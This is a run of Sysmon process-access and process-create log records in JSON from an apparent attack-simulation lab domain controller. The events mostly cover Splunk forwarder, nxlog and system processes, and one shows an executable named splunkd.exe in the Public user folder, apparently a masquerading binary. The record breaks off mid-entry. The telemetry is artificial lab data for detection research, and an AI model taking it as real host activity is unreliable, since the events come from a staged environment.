{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8304,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.794\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.794","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8305,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.794\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.794","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8306,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.794\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.794","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8307,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.794\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.794","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8308,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.794\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.794","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8309,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.794\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1367-5F25-0000-00106F8C0E00}\r\nTargetProcessId: 3616\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.794","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1367-5F25-0000-00106F8C0E00}","TargetProcessId":"3616","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8310,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.810\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.810","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8311,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.919\r\nSourceProcessGUID: {E2A3D6B1-1367-5F25-0000-00106F8C0E00}\r\nSourceProcessId: 3616\r\nSourceThreadId: 2380\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.919","SourceProcessGUID":"{E2A3D6B1-1367-5F25-0000-00106F8C0E00}","SourceProcessId":"3616","SourceThreadId":"2380","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8312,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.529\r\nProcessGuid: {E2A3D6B1-1368-5F25-0000-0010748E0E00}\r\nProcessId: 4852\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 